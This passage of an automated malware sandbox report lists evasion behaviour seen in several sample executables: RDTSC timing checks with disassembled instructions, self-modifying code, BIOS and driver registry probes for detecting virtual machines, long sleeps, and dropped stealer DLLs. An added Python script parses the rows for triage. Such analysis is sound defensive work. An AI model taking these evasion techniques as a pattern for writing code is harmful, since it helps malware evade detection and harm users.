Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | RDTSC instruction interceptor: First address: 4BD0489 second address: 4BD0490 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | RDTSC instruction interceptor: First address: 4BD0490 second address: 4BD04A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 0371BDBAh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | RDTSC instruction interceptor: First address: 4BD04A4 second address: 4BD04BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8434h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | RDTSC instruction interceptor: First address: 4BD04E4 second address: 4BD0508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888269h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | RDTSC instruction interceptor: First address: 4BD0508 second address: 4BD050C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | RDTSC instruction interceptor: First address: 4BD050C second address: 4BD0512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | RDTSC instruction interceptor: First address: 845DD7 second address: 845DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | RDTSC instruction interceptor: First address: 845DDD second address: 845DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 323296 second address: 322B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor dword ptr [ebp+122D229Fh], eax 0x00000012 push dword ptr [ebp+122D140Dh] 0x00000018 jl 00007FD81D0C8440h 0x0000001e call dword ptr [ebp+122D188Eh] 0x00000024 pushad 0x00000025 cld 0x00000026 xor eax, eax 0x00000028 pushad 0x00000029 jne 00007FD81D0C842Ch 0x0000002f xor dword ptr [ebp+122D232Bh], ebx 0x00000035 mov ebx, dword ptr [ebp+122D28D3h] 0x0000003b popad 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 jl 00007FD81D0C842Ch 0x00000046 mov dword ptr [ebp+122D2973h], eax 0x0000004c sub dword ptr [ebp+122D26DCh], esi 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D26DCh], ebx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 add dword ptr [ebp+122D270Bh], edx 0x00000067 lodsw 0x00000069 stc 0x0000006a add eax, dword ptr [esp+24h] 0x0000006e jmp 00007FD81D0C842Eh 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 stc 0x00000078 jng 00007FD81D0C8427h 0x0000007e stc 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 push esi 0x00000085 pop esi 0x00000086 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 322B2E second address: 322B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 322B32 second address: 322B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 322B38 second address: 322B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 4A1FC3 second address: 4A1FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C842Eh 0x00000008 jmp 00007FD81D0C842Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 4902E1 second address: 4902F0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 4902F0 second address: 4902F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 4902F7 second address: 4902FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 4A122A second address: 4A1234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Special instruction interceptor: First address: 692B98 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Special instruction interceptor: First address: 83773F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Special instruction interceptor: First address: 84D58A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 322B98 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 4C773F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 4DD58A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Special instruction interceptor: First address: 11CF905 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Special instruction interceptor: First address: 11CF9CC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Special instruction interceptor: First address: 13EFFE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Special instruction interceptor: First address: 13D9EB8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Special instruction interceptor: First address: 144BEFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe | Special instruction interceptor: First address: 40BAAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe | Special instruction interceptor: First address: 5B184B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Special instruction interceptor: First address: 121F905 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Special instruction interceptor: First address: 121F9CC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Special instruction interceptor: First address: 143FFE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Special instruction interceptor: First address: 1429EB8 instructions caused by: Self-modifying code
Source: C:\ProgramData\jnxnee\benskvi.exe | Special instruction interceptor: First address: 40BAAA instructions caused by: Self-modifying code
Source: C:\ProgramData\jnxnee\benskvi.exe | Special instruction interceptor: First address: 5B184B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Special instruction interceptor: First address: 149BEFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Special instruction interceptor: First address: 1D2B98 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Special instruction interceptor: First address: 37773F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Special instruction interceptor: First address: 38D58A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Special instruction interceptor: First address: 8DB12E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Special instruction interceptor: First address: B15B78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Code function: 11_2_04BD03B4 rdtsc 11_2_04BD03B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5117
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3953
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5548
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4237
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 959
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 885
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1834
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1078
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1070
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Window / User API: threadDelayed 376
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6365
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6599
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3117
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1461
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2455
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3881
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 718
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4824
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5930
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111210101\f0b421a199.exe
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111240101\c70962c806.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111230101\5ef8bafe70.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111250101\df2fea7261.exe
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111200101\5a57aa51d3.exe
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111220101\c105f06ef0.exe
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exe
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | API coverage: 3.3 %
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | API coverage: 4.2 %
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | API coverage: 6.6 %
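The rows in this section are table cells that the extraction ran together (the Source path and optional TID glued onto the signature name, with the "Jump to behavior" / "Jump to dropped file" link text left on the end), which makes them awkward to triage by hand. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it splits rows of that shape back into fields and summarises the evasion indicators per process, namely sleep requests that met the sandbox's 30000 threshold (the "-Xs >= -30000s" comparison printed in the rows), payloads dropped but never run, and the BIOS/driver registry values queried. The row grammar and the SIGNATURES list are inferred from this section's rows; the sample input is copied from them and is constructed for the example.

```python
# Added example, not part of the Joe Sandbox report: splits this section's
# flattened rows back into fields and summarises evasion indicators per process.
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Signature names exactly as they open each row's detail column (from this section).
SIGNATURES = ("RDTSC instruction interceptor", "Special instruction interceptor",
              "Registry key queried", "Code function", "Thread delayed",
              "Window / User API", "Dropped PE file which has not been started",
              "API coverage", "Thread sleep count", "Thread sleep time")

# The extraction glued "Source: <path>" and "TID: <n>" onto the signature name
# and appended "Jump to behavior" / "Jump to dropped file" link text.
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.+?\.(?:exe|dll))\s*(?:TID:\s*(?P<tid>\d+))?\s*"
    r"(?P<signature>" + "|".join(re.escape(s) for s in SIGNATURES) + r")\s*:?\s*"
    r"(?P<detail>.*?)\s*(?:Jump to behavior|Jump to dropped file)?\s*$",
    re.IGNORECASE)
SLEEP_RE = re.compile(r"-(\d+)s\s*>=\s*-(\d+)s")   # "-40020s >= -30000s"
REG_NAME_RE = re.compile(r"name:\s*(\S+)\s*$")     # "... name: SystemBiosVersion"


@dataclass(frozen=True)
class Row:
    source: str
    tid: Optional[int]
    signature: str
    detail: str

    @property
    def process(self) -> str:
        return self.source.rsplit("\\", 1)[-1]   # basename = per-process key


def parse_rows(text: str) -> List[Row]:
    """One Row per line matching the report grammar; anything else is skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            sig = next(s for s in SIGNATURES if s.lower() == m["signature"].lower())
            rows.append(Row(m["source"], int(m["tid"]) if m["tid"] else None, sig, m["detail"]))
    return rows


def summarize(rows: List[Row]) -> Dict[str, Counter]:
    """Count evasion signatures per process basename."""
    per_proc: Dict[str, Counter] = defaultdict(Counter)
    for r in rows:
        per_proc[r.process][r.signature] += 1
    return dict(per_proc)


def long_sleeps(rows: List[Row]) -> List[Tuple[str, Optional[int], int]]:
    """(process, tid, delay) for sleep rows that meet the sandbox's '>= -30000s' test."""
    hits = []
    for r in rows:
        m = SLEEP_RE.search(r.detail) if r.signature == "Thread sleep time" else None
        if m and int(m[1]) >= int(m[2]):
            hits.append((r.process, r.tid, int(m[1])))
    return hits


def dropped_not_started(rows: List[Row]) -> Dict[str, List[str]]:
    """Payloads each process wrote to disk but never executed during the run."""
    out: Dict[str, List[str]] = defaultdict(list)
    for r in rows:
        if r.signature == "Dropped PE file which has not been started":
            out[r.process].append(r.detail)
    return dict(out)


def registry_probes(rows: List[Row]) -> Dict[str, List[str]]:
    """Registry value names queried (BIOS/driver strings commonly used to fingerprint VMs)."""
    out: Dict[str, List[str]] = defaultdict(list)
    for r in rows:
        m = REG_NAME_RE.search(r.detail) if r.signature == "Registry key queried" else None
        if m:
            out[r.process].append(m[1])
    return dict(out)


# Constructed sample: seven rows copied from this section as the extraction rendered them.
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 322B2E second address: 322B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1956Thread sleep count: 1047 > 30
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe TID: 664Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111210101\f0b421a199.exeJump to dropped file
Source: C:\Windows\System32\svchost.exe TID: 6460Thread sleep time: -30000s >= -30000s
"""

if __name__ == "__main__":
    parsed = parse_rows(SAMPLE)
    print(summarize(parsed), long_sleeps(parsed), dropped_not_started(parsed), registry_probes(parsed), sep="\n")
```

The sleep values are kept exactly as the report prints them (the report labels them "s"; the comparison against the 30000 threshold is the sandbox's own), so the parser makes no assumption about units. Feed it the full section rather than the sample to get the per-process picture, for example that rapes.exe both spins in sleep loops and drops a dozen payloads it never launches.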
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 | Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7340 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1956 | Thread sleep count: 1047 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1956 | Thread sleep time: -2095047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1940 | Thread sleep count: 959 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1940 | Thread sleep time: -1918959s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1860 | Thread sleep count: 272 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1860 | Thread sleep time: -8160000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1960 | Thread sleep count: 885 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1960 | Thread sleep time: -1770885s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 912 | Thread sleep count: 1834 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 912 | Thread sleep time: -3669834s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1232 | Thread sleep count: 1078 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1232 | Thread sleep time: -2157078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7464 | Thread sleep count: 1070 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7464 | Thread sleep time: -2141070s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7440 | Thread sleep count: 376 > 30
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7440 | Thread sleep time: -11280000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 1400 | Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 4228 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7440 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe TID: 664 | Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe TID: 4220 | Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe TID: 4252 | Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe TID: 8072 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 8020 | Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 7460 | Thread sleep time: -46023s >= -30000s
